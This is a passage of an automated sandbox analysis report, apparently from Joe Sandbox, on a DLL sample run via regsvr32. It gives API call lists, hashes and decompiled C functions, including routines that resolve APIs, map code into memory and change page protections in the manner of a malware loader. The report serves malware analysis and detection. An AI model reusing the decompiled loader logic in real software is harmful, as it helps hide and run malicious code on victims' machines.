                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                  • Opcode ID: eb6460ec6e53da9aeb1d8bd1946283f175524c24a15952dfd8e6347f69b949b3
                                                                                                                                                                  • Instruction ID: f4f44c6bba7f701c16d3fe5d44c5c0fecfff7699029a59416472603edb4186be
                                                                                                                                                                  • Opcode Fuzzy Hash: eb6460ec6e53da9aeb1d8bd1946283f175524c24a15952dfd8e6347f69b949b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B0184B6A00114FBDB018BA9CC41EAFB7BDEB9D340F124162AF00E3104F735DA01DAA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E67CD1444(void* __eax) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				long _t24;
                                                                                                                                                                  				long _t26;
                                                                                                                                                                  				long _t29;
                                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                                  				void* _t41;
                                                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                                                  				void* _t44;
                                                                                                                                                                  
                                                                                                                                                                  				_t41 = __eax;
                                                                                                                                                                  				_t16 =  *0x67cd41cc;
                                                                                                                                                                  				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x67cd41cc - 0x63698bc4 &  !( *0x67cd41cc - 0x63698bc4);
                                                                                                                                                                  				_t18 = E67CD1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x67cd41cc - 0x63698bc4 &  !( *0x67cd41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x67cd41cc - 0x63698bc4 &  !( *0x67cd41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                                                  					_t29 = 8;
                                                                                                                                                                  					goto L8;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t40 = _v8;
                                                                                                                                                                  					_t29 = E67CD1A5A(_t33, _t40, _t41);
                                                                                                                                                                  					if(_t29 == 0) {
                                                                                                                                                                  						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                                                  						_t24 = E67CD1F7C(_t40, _t44); // executed
                                                                                                                                                                  						_t29 = _t24;
                                                                                                                                                                  						if(_t29 == 0) {
                                                                                                                                                                  							_t26 = E67CD126D(_t44, _t40); // executed
                                                                                                                                                                  							_t29 = _t26;
                                                                                                                                                                  							if(_t29 == 0) {
                                                                                                                                                                  								_push(_t26);
                                                                                                                                                                  								_push(1);
                                                                                                                                                                  								_push(_t40);
                                                                                                                                                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                                                  									_t29 = GetLastError();
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t42 = _v12;
                                                                                                                                                                  					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                                                  					E67CD142F(_t42);
                                                                                                                                                                  					L8:
                                                                                                                                                                  					return _t29;
                                                                                                                                                                  				}
                                                                                                                                                                  			}















                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 67CD1060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,67CD1480,?,?,?,?,00000002,00000000,?,?), ref: 67CD1084
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10A6
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10BC
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10D2
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10E8
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10FE
                                                                                                                                                                    • Part of subcall function 67CD1A5A: memcpy.NTDLL(00000000,00000002,67CD148E,?,?,?,?,?,67CD148E,?,?,?,?,?,?,00000002), ref: 67CD1A87
                                                                                                                                                                    • Part of subcall function 67CD1A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 67CD1ABA
                                                                                                                                                                    • Part of subcall function 67CD1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 67CD1FB4
                                                                                                                                                                    • Part of subcall function 67CD126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 67CD12A6
                                                                                                                                                                    • Part of subcall function 67CD126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 67CD131B
                                                                                                                                                                    • Part of subcall function 67CD126D: GetLastError.KERNEL32 ref: 67CD1321
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 67CD14C2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2673762927-0
                                                                                                                                                                  • Opcode ID: 6493382091ed6b1dbbcca059d49085b065d75c402498bcf92bad417865ccc47b
                                                                                                                                                                  • Instruction ID: 4b85070b657634d7fa46d279020ede98698805d31fd9aea663bd2ad6d50766c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 6493382091ed6b1dbbcca059d49085b065d75c402498bcf92bad417865ccc47b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D110477601705ABD7209BED8C84D9B77BDAF8C308B058169EB05A7641FBA0E906C7A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___crtGetLocaleInfoA.LIBCMT ref: 67D33C12
                                                                                                                                                                    • Part of subcall function 67D3FA7E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 67D3FA8A
                                                                                                                                                                    • Part of subcall function 67D3FA7E: __crtGetLocaleInfoA_stat.LIBCMT ref: 67D3FA9F
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 67D33C24
                                                                                                                                                                  • ___crtGetLocaleInfoA.LIBCMT ref: 67D33C44
                                                                                                                                                                  • ___crtGetLocaleInfoA.LIBCMT ref: 67D33C86
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 67D33C59
                                                                                                                                                                    • Part of subcall function 67D33A00: __calloc_impl.LIBCMT ref: 67D33A0F
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 67D33C9B
                                                                                                                                                                  • _free.LIBCMT ref: 67D33CB3
                                                                                                                                                                  • _free.LIBCMT ref: 67D33CF3
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 67D33D1D
                                                                                                                                                                  • _free.LIBCMT ref: 67D33D43
                                                                                                                                                                  • __invoke_watson.LIBCMT ref: 67D33D93
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1731282729-0
                                                                                                                                                                  • Opcode ID: 1a5636b247f22a40704e50a1f9e931fe6a5ff0b570614240f8885ec7e85dac62
                                                                                                                                                                  • Instruction ID: 0cbcacb847b2ea5cdf32c8823f86458a16a49b1231ffb5e560c541519466a9f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a5636b247f22a40704e50a1f9e931fe6a5ff0b570614240f8885ec7e85dac62
                                                                                                                                                                  • Instruction Fuzzy Hash: 525184B590422AEBEF108F759E41B9AFB79EF0A324F104895FA0CA2141EF71C9548B71
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 67D3E86E
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 67D3E87F
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 67D3E89B
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 67D3E8C5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale_wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1351282208-0
                                                                                                                                                                  • Opcode ID: 92780a96872c9aaa9804ae393cc1ac1d808b7925a66caa1e64e1c0e4a76b148b
                                                                                                                                                                  • Instruction ID: 1eb0ef6c73fc32b0934bd77f77cb4e662a91661d9d455fd923770380767c4077
                                                                                                                                                                  • Opcode Fuzzy Hash: 92780a96872c9aaa9804ae393cc1ac1d808b7925a66caa1e64e1c0e4a76b148b
                                                                                                                                                                  • Instruction Fuzzy Hash: D5018831944165FBF7005F55D845EC9B79CAF4E675B008C25FA08D60C0E760D940C7F5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD1F10() {
                                                                                                                                                                  				void* _t1;
                                                                                                                                                                  				long _t3;
                                                                                                                                                                  				void* _t4;
                                                                                                                                                                  				long _t5;
                                                                                                                                                                  				void* _t6;
                                                                                                                                                                  				intOrPtr _t8;
                                                                                                                                                                  
                                                                                                                                                                  				_t8 =  *0x67cd41b0;
                                                                                                                                                                  				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                  				 *0x67cd41bc = _t1;
                                                                                                                                                                  				if(_t1 == 0) {
                                                                                                                                                                  					return GetLastError();
                                                                                                                                                                  				}
                                                                                                                                                                  				_t3 = GetVersion();
                                                                                                                                                                  				if(_t3 <= 5) {
                                                                                                                                                                  					_t4 = 0x32;
                                                                                                                                                                  					return _t4;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					 *0x67cd41ac = _t3;
                                                                                                                                                                  					_t5 = GetCurrentProcessId();
                                                                                                                                                                  					 *0x67cd41a8 = _t5;
                                                                                                                                                                  					 *0x67cd41b0 = _t8;
                                                                                                                                                                  					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                  					 *0x67cd41a4 = _t6;
                                                                                                                                                                  					if(_t6 == 0) {
                                                                                                                                                                  						 *0x67cd41a4 =  *0x67cd41a4 | 0xffffffff;
                                                                                                                                                                  					}
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,67CD1C8E,74B063F0,00000000), ref: 67CD1F1F
                                                                                                                                                                  • GetVersion.KERNEL32 ref: 67CD1F2E
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 67CD1F3D
                                                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 67CD1F56
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 845504543-0
                                                                                                                                                                  • Opcode ID: ce032296b3e5a79e749c00e578f47e7f881d86f8f6cc18fda0c028125ddc9b01
                                                                                                                                                                  • Instruction ID: 20c12737b4e337360f54e2c33a11dea2938aa9ccc48dcdfccef6a3ed0ed9d74c
                                                                                                                                                                  • Opcode Fuzzy Hash: ce032296b3e5a79e749c00e578f47e7f881d86f8f6cc18fda0c028125ddc9b01
                                                                                                                                                                  • Instruction Fuzzy Hash: CDF04971644210EFEB00ABB8A84B7813BB4A71B711F21401AFB51D91D0E7789242CB0C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 67D2DDB2
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 67D2DE67
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebuggerPresent_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2328436684-0
                                                                                                                                                                  • Opcode ID: abd04762f2dd34878fe0353ac99c1eec80738c02f19352917fbffb7f14301e7c
                                                                                                                                                                  • Instruction ID: 8a53c7bf7648dd15d70719932c87b81d52190378de629dc26854c4c92fb01491
                                                                                                                                                                  • Opcode Fuzzy Hash: abd04762f2dd34878fe0353ac99c1eec80738c02f19352917fbffb7f14301e7c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6331C57580122CDBCB61DF64D8887C9B7B4BF0C324F6046EAE91CA7250EB349B858F55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,67D2DE7B,?,?,?,00000001), ref: 67D35ED7
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 67D35EE0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: @$^0
                                                                                                                                                                  • API String ID: 0-2280991083
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD2485(long _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				short* _v32;
                                                                                                                                                                  				void _v36;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				signed int _t58;
                                                                                                                                                                  				signed int _t61;
                                                                                                                                                                  				signed int _t62;
                                                                                                                                                                  				void* _t63;
                                                                                                                                                                  				signed int* _t68;
                                                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  				signed int _t77;
                                                                                                                                                                  				void* _t78;
                                                                                                                                                                  				void _t80;
                                                                                                                                                                  				signed int _t81;
                                                                                                                                                                  				signed int _t84;
                                                                                                                                                                  				signed int _t86;
                                                                                                                                                                  				short* _t87;
                                                                                                                                                                  				void* _t89;
                                                                                                                                                                  				signed int* _t90;
                                                                                                                                                                  				long _t91;
                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                  				signed int _t94;
                                                                                                                                                                  				signed int _t100;
                                                                                                                                                                  				signed int _t102;
                                                                                                                                                                  				void* _t104;
                                                                                                                                                                  				long _t108;
                                                                                                                                                                  				signed int _t110;
                                                                                                                                                                  
                                                                                                                                                                  				_t108 = _a4;
                                                                                                                                                                  				_t76 =  *(_t108 + 8);
                                                                                                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                  					L3:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				_a4 =  *[fs:0x4];
                                                                                                                                                                  				_v8 =  *[fs:0x8];
                                                                                                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                  					if(_t102 != 0xffffffff) {
                                                                                                                                                                  						_t91 = 0;
                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                  						_a4 = 0;
                                                                                                                                                                  						_t57 = _t76;
                                                                                                                                                                  						do {
                                                                                                                                                                  							_t80 =  *_t57;
                                                                                                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                  							if(_t80 == 0xffffffff) {
                                                                                                                                                                  								goto L9;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _t80 - _t91;
                                                                                                                                                                  							if(_t80 >= _t91) {
                                                                                                                                                                  								L20:
                                                                                                                                                                  								_t63 = 0;
                                                                                                                                                                  								L60:
                                                                                                                                                                  								return _t63;
                                                                                                                                                                  							}
                                                                                                                                                                  							L9:
                                                                                                                                                                  							__eflags =  *(_t57 + 4);
                                                                                                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                                                                                                  								_t12 =  &_a4;
                                                                                                                                                                  								 *_t12 = _a4 + 1;
                                                                                                                                                                  								__eflags =  *_t12;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                                                  							_t57 = _t57 + 0xc;
                                                                                                                                                                  							__eflags = _t91 - _t102;
                                                                                                                                                                  						} while (_t91 <= _t102);
                                                                                                                                                                  						__eflags = _a4;
                                                                                                                                                                  						if(_a4 == 0) {
                                                                                                                                                                  							L15:
                                                                                                                                                                  							_t81 =  *0x67cd41f8;
                                                                                                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                  							_t58 = 0;
                                                                                                                                                                  							__eflags = _t81;
                                                                                                                                                                  							if(_t81 <= 0) {
                                                                                                                                                                  								L18:
                                                                                                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                  								__eflags = _t61;
                                                                                                                                                                  								if(_t61 < 0) {
                                                                                                                                                                  									_t62 = 0;
                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t62 = _a4;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t62;
                                                                                                                                                                  								if(_t62 == 0) {
                                                                                                                                                                  									L59:
                                                                                                                                                                  									_t63 = _t104;
                                                                                                                                                                  									goto L60;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                                                                                                  									if(_v12 != 0x1000000) {
                                                                                                                                                                  										goto L59;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                  										L46:
                                                                                                                                                                  										_t63 = 1;
                                                                                                                                                                  										 *0x67cd4240 = 1;
                                                                                                                                                                  										__eflags =  *0x67cd4240;
                                                                                                                                                                  										if( *0x67cd4240 != 0) {
                                                                                                                                                                  											goto L60;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t84 =  *0x67cd41f8;
                                                                                                                                                                  										__eflags = _t84;
                                                                                                                                                                  										_t93 = _t84;
                                                                                                                                                                  										if(_t84 <= 0) {
                                                                                                                                                                  											L51:
                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                  											if(_t93 != 0) {
                                                                                                                                                                  												L58:
                                                                                                                                                                  												 *0x67cd4240 = 0;
                                                                                                                                                                  												goto L5;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t77 = 0xf;
                                                                                                                                                                  											__eflags = _t84 - _t77;
                                                                                                                                                                  											if(_t84 <= _t77) {
                                                                                                                                                                  												_t77 = _t84;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t94 = 0;
                                                                                                                                                                  											__eflags = _t77;
                                                                                                                                                                  											if(_t77 < 0) {
                                                                                                                                                                  												L56:
                                                                                                                                                                  												__eflags = _t84 - 0x10;
                                                                                                                                                                  												if(_t84 < 0x10) {
                                                                                                                                                                  													_t86 = _t84 + 1;
                                                                                                                                                                  													__eflags = _t86;
                                                                                                                                                                  													 *0x67cd41f8 = _t86;
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L58;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												do {
                                                                                                                                                                  													_t68 = 0x67cd4200 + _t94 * 4;
                                                                                                                                                                  													_t94 = _t94 + 1;
                                                                                                                                                                  													__eflags = _t94 - _t77;
                                                                                                                                                                  													 *_t68 = _t110;
                                                                                                                                                                  													_t110 =  *_t68;
                                                                                                                                                                  												} while (_t94 <= _t77);
                                                                                                                                                                  												goto L56;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  										_t69 = 0x67cd41fc + _t84 * 4;
                                                                                                                                                                  										while(1) {
                                                                                                                                                                  											__eflags =  *_t69 - _t110;
                                                                                                                                                                  											if( *_t69 == _t110) {
                                                                                                                                                                  												goto L51;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t93 = _t93 - 1;
                                                                                                                                                                  											_t69 = _t69 - 4;
                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                  											if(_t93 > 0) {
                                                                                                                                                                  												continue;
                                                                                                                                                                  											}
                                                                                                                                                                  											goto L51;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L51;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t87 = _v32;
                                                                                                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                                                                                                  										goto L59;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                  									if( *_t71 != 0x4550) {
                                                                                                                                                                  										goto L59;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                  										goto L59;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t78 = _t76 - _t87;
                                                                                                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                  										goto L59;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                  									__eflags = _t78 - _t72;
                                                                                                                                                                  									if(_t78 < _t72) {
                                                                                                                                                                  										goto L46;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                  										goto L46;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                  										goto L20;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L46;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								goto L16;
                                                                                                                                                                  							}
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								L16:
                                                                                                                                                                  								__eflags =  *((intOrPtr*)(0x67cd4200 + _t58 * 4)) - _t110;
                                                                                                                                                                  								if( *((intOrPtr*)(0x67cd4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t58 = _t58 + 1;
                                                                                                                                                                  								__eflags = _t58 - _t81;
                                                                                                                                                                  								if(_t58 < _t81) {
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                  							if(_t58 <= 0) {
                                                                                                                                                                  								goto L5;
                                                                                                                                                                  							}
                                                                                                                                                                  							 *0x67cd4240 = 1;
                                                                                                                                                                  							__eflags =  *0x67cd4240;
                                                                                                                                                                  							if( *0x67cd4240 != 0) {
                                                                                                                                                                  								goto L5;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags =  *((intOrPtr*)(0x67cd4200 + _t58 * 4)) - _t110;
                                                                                                                                                                  							if( *((intOrPtr*)(0x67cd4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                  								L32:
                                                                                                                                                                  								_t100 = 0;
                                                                                                                                                                  								__eflags = _t58;
                                                                                                                                                                  								if(_t58 < 0) {
                                                                                                                                                                  									L34:
                                                                                                                                                                  									 *0x67cd4240 = 0;
                                                                                                                                                                  									goto L5;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									goto L33;
                                                                                                                                                                  								}
                                                                                                                                                                  								do {
                                                                                                                                                                  									L33:
                                                                                                                                                                  									_t90 = 0x67cd4200 + _t100 * 4;
                                                                                                                                                                  									_t100 = _t100 + 1;
                                                                                                                                                                  									__eflags = _t100 - _t58;
                                                                                                                                                                  									 *_t90 = _t110;
                                                                                                                                                                  									_t110 =  *_t90;
                                                                                                                                                                  								} while (_t100 <= _t58);
                                                                                                                                                                  								goto L34;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t58 = _t81 - 1;
                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                  							if(_t58 < 0) {
                                                                                                                                                                  								L28:
                                                                                                                                                                  								__eflags = _t81 - 0x10;
                                                                                                                                                                  								if(_t81 < 0x10) {
                                                                                                                                                                  									_t81 = _t81 + 1;
                                                                                                                                                                  									__eflags = _t81;
                                                                                                                                                                  									 *0x67cd41f8 = _t81;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t58 = _t81 - 1;
                                                                                                                                                                  								goto L32;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								goto L25;
                                                                                                                                                                  							}
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								L25:
